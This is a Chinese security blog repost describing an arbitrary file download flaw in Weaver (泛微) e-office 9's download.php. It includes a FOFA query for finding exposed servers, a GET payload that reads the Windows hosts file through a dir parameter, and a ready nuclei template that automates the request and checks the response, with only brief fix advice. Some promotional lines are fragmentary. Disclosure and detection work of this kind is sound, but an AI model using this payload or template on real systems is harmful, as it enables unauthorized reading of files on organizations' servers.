泛微e-office download.php存在任意文件下载

admin 2024年2月15日20:32:49评论21 views字数 1121阅读3分44秒阅读模式

扫码领资料

获网安教程

免费&进群

泛微e-office download.php存在任意文件下载

泛微e-office download.php存在任意文件下载

本文由掌控安全- a530857523 稿

0x01 应用介绍

泛微e-office系统是标准、易用、快速部署上线的专业协同OA软件,国内协同OA办公领域领导品牌,致力于为企业用户提供专业OA办公系统、移动OA应用等协同OA整体解决方案

0x02 影响版本及语法特征

泛微e-offcie9
fofa:app=”泛微-EOffice” && body=”您的浏览器处于弹出窗口阻止模式!建议您关闭”

0x03 漏洞复现

payload:/general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:WindowsSystem32driversetc
直接使用get请求拼接该payload即可下载目标主机hosts文件
泛微e-office download.php存在任意文件下载

下载完成后打开文件查看
泛微e-office download.php存在任意文件下载
下载服务器文件复现成功

nuclei

id: fanwei-E-Office-file-read
info:
name: fanwei-E-Office-file-read
author: fanwei-E-Office-file-read
severity: critical
tags: fanwei

http:
- raw:
- |
GET /general/file_folder/file_new/neworedit/download.php?filename=hosts&dir=C:WindowsSystem32driversetc HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

matchers-condition: and
matchers:
- type: word
words:
- "127.0.0.1"
- type: status
status:
- 200

泛微e-office download.php存在任意文件下载

修复建议

使用最新版本的应用

限制漏洞路径的访问

.

泛微e-office download.php存在任意文件下载

~

+++

泛微e-office download.php存在任意文件下载

Xray

cs4.0使

|CNVD

SRC++

|IP

泛微e-office download.php存在任意文件下载

+~~

原文始发于微信公众号(掌控安全EDU):泛微e-office download.php存在任意文件下载

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月15日20:32:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   泛微e-office download.php存在任意文件下载https://cn-sec.com/archives/2165694.html

发表评论

匿名网友 填写信息